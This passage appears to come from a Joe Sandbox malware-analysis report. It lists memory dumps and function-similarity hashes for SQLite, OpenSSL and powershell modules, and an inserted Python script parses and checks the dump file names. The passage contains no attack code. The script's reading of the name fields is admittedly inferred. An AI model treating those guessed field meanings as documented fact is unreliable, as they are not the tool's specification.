• Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
Similarity
• API ID:
• String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                      • API String ID: 0-3764764234
                                                                                                                                                                      • Opcode ID: 7e0931b530375c124a3ee55f9c72696fa5ae99066ddf30af2e12f5de08f06c38
                                                                                                                                                                      • Instruction ID: fcb4a7c5bd262dbdaf942061b16caef5a07af6491800f3cb0dc5bd2e293ecb1a
                                                                                                                                                                      • Opcode Fuzzy Hash: 7e0931b530375c124a3ee55f9c72696fa5ae99066ddf30af2e12f5de08f06c38
                                                                                                                                                                      • Instruction Fuzzy Hash: E1A10173B0C2D14AD7648B299464ABE7BA1EB81780F444335DBBA8B6C9EF3CE545D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: %s-shm$readonly_shm$winOpenShm
                                                                                                                                                                      • API String ID: 817585512-2815843928
                                                                                                                                                                      • Opcode ID: 8d2a6488cfe544708466a8bb6c48c74f0afd239d4f67e3118775d9e63ad55e06
                                                                                                                                                                      • Instruction ID: e9db666d3b71bc63af13f29824b51147682644731c80cce060834dab8dfb5803
                                                                                                                                                                      • Opcode Fuzzy Hash: 8d2a6488cfe544708466a8bb6c48c74f0afd239d4f67e3118775d9e63ad55e06
                                                                                                                                                                      • Instruction Fuzzy Hash: BEC15D22F09A4682EB659F21E474A7933A0FF44B58F544335DABE866E8EF3CE545C340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                      • API String ID: 817585512-3764764234
                                                                                                                                                                      • Opcode ID: 8a81c8cbb4aa2b9f2a700104a6053669787526fe1ac8cdbb7c926e4a602ee9f8
                                                                                                                                                                      • Instruction ID: febd7ce28058270329f84666405d8797d4ac42a439ebd5bf7c709038e8895211
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a81c8cbb4aa2b9f2a700104a6053669787526fe1ac8cdbb7c926e4a602ee9f8
                                                                                                                                                                      • Instruction Fuzzy Hash: 47813623F091D149E326CE25A0609F93B91E751791F45423AEEF98B3C9DB3CD986D310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                      • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
                                                                                                                                                                      • API String ID: 3568877910-2527649602
                                                                                                                                                                      • Opcode ID: 0e985a8a8b04577a75530f8da03813db32c934ecaddc4bfaf0d1495dbf65c132
                                                                                                                                                                      • Instruction ID: 89273eab57cdd18bd29107937fadd0fe2ae322fd0fa662bd6086673e69126ba9
                                                                                                                                                                      • Opcode Fuzzy Hash: 0e985a8a8b04577a75530f8da03813db32c934ecaddc4bfaf0d1495dbf65c132
                                                                                                                                                                      • Instruction Fuzzy Hash: 54B18C25A18B4296EB56EB61D4907FD2751FB84B84F845036EB0D8B7BEDF3CE6448320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                      • API String ID: 817585512-2063813899
                                                                                                                                                                      • Opcode ID: ae3576a08cffc50c0b9da51265b3510242f5db549aeed4a2ff833255ebe0b22f
                                                                                                                                                                      • Instruction ID: e4df1b2d4c99c4648620b8e617c5319cde457228d495d2187cc95787b69f5ffd
                                                                                                                                                                      • Opcode Fuzzy Hash: ae3576a08cffc50c0b9da51265b3510242f5db549aeed4a2ff833255ebe0b22f
                                                                                                                                                                      • Instruction Fuzzy Hash: 6391BF63F09B8686EB50CF159420ABA77A5FB48F84F459235DE6D87789EF39E040C340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A451170
                                                                                                                                                                      • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
                                                                                                                                                                      • API String ID: 1105866626-4157686371
                                                                                                                                                                      • Opcode ID: 4701a5b41dac6050d5a31ac7eef3957fda4ec9d044bd4018a4c05d58d4e8cbf3
                                                                                                                                                                      • Instruction ID: 59d2e6c2d3b826f63cdcd35cf3815f995c836e69d83c7f6874147be1f9f124ea
                                                                                                                                                                      • Opcode Fuzzy Hash: 4701a5b41dac6050d5a31ac7eef3957fda4ec9d044bd4018a4c05d58d4e8cbf3
                                                                                                                                                                      • Instruction Fuzzy Hash: 7971E022F1968285EB62EB21D4003BD6390EF45784F58A036DB4D47BBADF3CE5848701
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2037809311.00007FFDFAC71000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDFAC70000, based on PE: true
• Associated: 00000001.00000002.2037779023.00007FFDFAC70000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFACD2000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD1E000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD21000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD26000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD80000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD83000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD85000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD88000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2038143865.00007FFDFAD89000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2038180876.00007FFDFAD8B000.00000004.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfac70000_mei.jbxd
Similarity
• API ID: 00007B6570
• String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
• API String ID: 4069847057-87138338
• Opcode ID: 8de3eb989cf6c62dcbce841305c01691443b1373284778389dc9e239678f53b6
• Instruction ID: 097ebe853a2971b789461a906815368ca283acbc5161b553d8f181c3e6012b14
• Opcode Fuzzy Hash: 8de3eb989cf6c62dcbce841305c01691443b1373284778389dc9e239678f53b6
• Instruction Fuzzy Hash: E0610776B1864247E7688B19B820E7EB652FB80790F444275EA7D477DDEF7CD9018700
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
• Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
Similarity
• API ID: 00007A4519
• String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
• API String ID: 817585512-3764764234
• Opcode ID: 8f983514268cc7df1290e166eec0b47a294775388fb5c19de4c52b4ac99553b0
• Instruction ID: 293f61463d40fe2bf15cf2592a7e30d0327caa3eeb3e0e7fa9fbd402f72518d9
• Opcode Fuzzy Hash: 8f983514268cc7df1290e166eec0b47a294775388fb5c19de4c52b4ac99553b0
• Instruction Fuzzy Hash: 3F518F33B08B8196EB54CF26D154AA973A4FB48B84F944236DF6D87798EF38E495C300
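The Memory Dump Source block of the record above lists every memory dump Joe Sandbox associates with one loaded module, and the same layout repeats for each record on this page. As an added example (written for this page, not Joe Sandbox code and not part of the report), the following Python parses such a block and checks the three invariants that hold for every record listed here: all dumps share the same final dotted field, the Offset equals the lowest dump address, and the Associated dumps are listed in ascending address order. The sample record is copied verbatim from the record above, including the "Download File" link text that the page extraction fused onto each file name; the second, inconsistent record is constructed for the demonstration. Only two fields of a .sdmp name are given a meaning here, and that reading is an assumption drawn from the listing itself rather than from Joe Sandbox documentation: field 4 is treated as a 64-bit virtual address and field 8 as the per-module identifier. The remaining fields are kept raw.

```python
"""Parse a Joe Sandbox 'Memory Dump Source' block and sanity-check it.

Added example for this report page; it is not Joe Sandbox code. Field
meanings are inferred from the listing (assumption): field 4 of a .sdmp
name is a 64-bit virtual address and field 8 is constant within one
record, so it is treated as the module identifier. Fields 1-3 and 5-7 are
kept raw because the page does not state what they mean.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

SDMP_RE = re.compile(
    r"^(?P<f1>[0-9A-Fa-f]{8})\.(?P<f2>[0-9A-Fa-f]{8})\.(?P<f3>\d+)\."
    r"(?P<address>[0-9A-Fa-f]{16})\.(?P<f5>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<f7>[0-9A-Fa-f]{8})\.(?P<module>[0-9A-Fa-f]{8})\.sdmp$"
)
# Extracted pages fuse the 'Download File' link text onto the name; the
# non-greedy match stops at the first '.sdmp' and discards the residue.
SOURCE_RE = re.compile(
    r"Source File:\s*([^\s,]+?\.sdmp),\s*Offset:\s*([0-9A-Fa-f]{16}),"
    r"\s*based on PE:\s*(true|false)"
)
ASSOC_RE = re.compile(r"Associated:\s*(\S+?\.sdmp)")


@dataclass
class Dump:
    name: str
    address: int
    module: str
    raw: Dict[str, str]


@dataclass
class Record:
    source: Dump
    offset: int
    based_on_pe: bool
    associated: List[Dump]


def parse_sdmp(name: str) -> Dump:
    """Split one .sdmp file name into its dotted fields."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name!r}")
    g = m.groupdict()
    return Dump(name.strip(), int(g["address"], 16), g["module"], g)


def parse_record(text: str) -> Record:
    """Parse the 'Source File' and 'Associated' lines of one record."""
    source, offset, pe, assoc = None, 0, False, []
    for line in text.splitlines():
        if m := SOURCE_RE.search(line):
            source = parse_sdmp(m.group(1))
            offset = int(m.group(2), 16)
            pe = m.group(3) == "true"
        elif m := ASSOC_RE.search(line):
            assoc.append(parse_sdmp(m.group(1)))
    if source is None:
        raise ValueError("record has no 'Source File' line")
    return Record(source, offset, pe, assoc)


def check_record(rec: Record) -> List[str]:
    """Return the violated invariants; an empty list means the record is consistent."""
    issues = []
    dumps = [rec.source] + rec.associated
    modules = sorted({d.module for d in dumps})
    if len(modules) != 1:
        issues.append(f"dumps span several modules: {modules}")
    lowest = min(d.address for d in dumps)
    if lowest != rec.offset:
        issues.append(f"Offset {rec.offset:016X} is not the lowest dump address {lowest:016X}")
    if rec.source.address < rec.offset:
        issues.append("Source File lies below the module Offset")
    addrs = [d.address for d in rec.associated]
    if addrs != sorted(set(addrs)):
        issues.append("Associated dumps are not listed in ascending, unique address order")
    return issues


# Copied from the record above on this page (final field 0000000C).
REPORT_RECORD = """\
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
• Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
• Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
• Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
• Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
• Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
• Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
"""

# Constructed for the demonstration (not from the report): the same record
# with the last dump's final field altered so it no longer matches.
CONSTRUCTED_BAD_RECORD = REPORT_RECORD.replace(
    "00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmp",
    "00007FFDFF304000.00000004.00000001.01000000.0000000D.sdmp",
)

if __name__ == "__main__":
    for label, text in (("report", REPORT_RECORD), ("constructed", CONSTRUCTED_BAD_RECORD)):
        rec = parse_record(text)
        print(f"{label}: module {rec.source.module}, base {rec.offset:016X}, "
              f"{len(rec.associated)} associated dumps, issues={check_record(rec) or 'none'}")
```

Running the script prints no issues for the copied record and one "dumps span several modules" issue for the constructed one. The invariant checks are deliberately limited to what is visible in the listing; nothing is assumed about module size or page protection, so the script does not claim more than the report shows.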
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
• Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
Similarity
• API ID: 00007A4519
• String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
• API String ID: 817585512-3764764234
• Opcode ID: fa40007d604dc6cc06400549b7ec3b66cbe8079a186df2d3bd517a7d904fd4b9
• Instruction ID: f1a20829406390ff04299c6b761b2d0edda07e120bf01012209d2bf012a6f98b
• Opcode Fuzzy Hash: fa40007d604dc6cc06400549b7ec3b66cbe8079a186df2d3bd517a7d904fd4b9
• Instruction Fuzzy Hash: 83416133B1878582E760CF15E460AA973A5FB84B90F55023AEA6D5B7ECDF3CE9418740
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
• Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\ssl\tls_srp.c
• API String ID: 3568877910-1778748169
• Opcode ID: 10ce8fe54628ff813415ccb6b761ad5681ec6e9ea4152f83edd5d38152cc8e62
• Instruction ID: 6d364aa38e0995c7c66f86ec7afe8cabfe3a1fcee7efcd145775a76a3cc98b24
• Opcode Fuzzy Hash: 10ce8fe54628ff813415ccb6b761ad5681ec6e9ea4152f83edd5d38152cc8e62
• Instruction Fuzzy Hash: C9415C66A0AB8280FA56EF2294507BD6390AF42F94F190534EF5E0B7BDDF3CE4418310
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
• Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
• API String ID: 3568877910-384499812
• Opcode ID: 068ff74c5e04d3b22dd643f34b65afc901536cdc3614985e071ae3aafa1cdff7
• Instruction ID: 6ad06d6067ac44b0b3817667502abd881f77fee4fe777e7f2bc3c04fa60cdf00
• Opcode Fuzzy Hash: 068ff74c5e04d3b22dd643f34b65afc901536cdc3614985e071ae3aafa1cdff7
• Instruction Fuzzy Hash: 72D11932A09B8692EB6ADF25D6802BD23A4FB54B80F448036DF5D477AADF3CE455C310
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
• Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\ssl\ssl_sess.c$ssl_get_prev_session
• API String ID: 3568877910-1331951588
• Opcode ID: a9de9a44b05c5c5aa1a5891343337ca6625fea67d96ce4dd5e9b6a7967049d33
• Instruction ID: bdcbf13573d9fcbd302c44b3861a3ac912eb92efa0753b12cb97325712c2e641
• Opcode Fuzzy Hash: a9de9a44b05c5c5aa1a5891343337ca6625fea67d96ce4dd5e9b6a7967049d33
• Instruction Fuzzy Hash: 1DC15876A186828AEB66DB21D4907AA6364FB84F88F844131EF4D4B7ADCF7CE545C700
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
Similarity
• API ID: 00007A4519
• String ID: out of memory$too many levels of trigger recursion
• API String ID: 817585512-3387558265
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
Similarity
• API ID: 00007B6570
• String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
• API String ID: 4069847057-118859582
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
Similarity
• API ID: 00007A4519
• String ID: cannot use RETURNING in a trigger$sqlite_returning
• API String ID: 817585512-753984552
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
Similarity
• API ID: Time$System$File
• String ID: gfff
• API String ID: 2838179519-1553575800
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
Similarity
• API ID: Time$System$File
• String ID: gfff
• API String ID: 2838179519-1553575800
Uniqueness
Uniqueness Score: -1.00%
Strings
Memory Dump Source
• Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
Similarity
• API ID:
• String ID: iS_L
• API String ID: 0-1272560476
Uniqueness
Uniqueness Score: -1.00%
Strings
Memory Dump Source
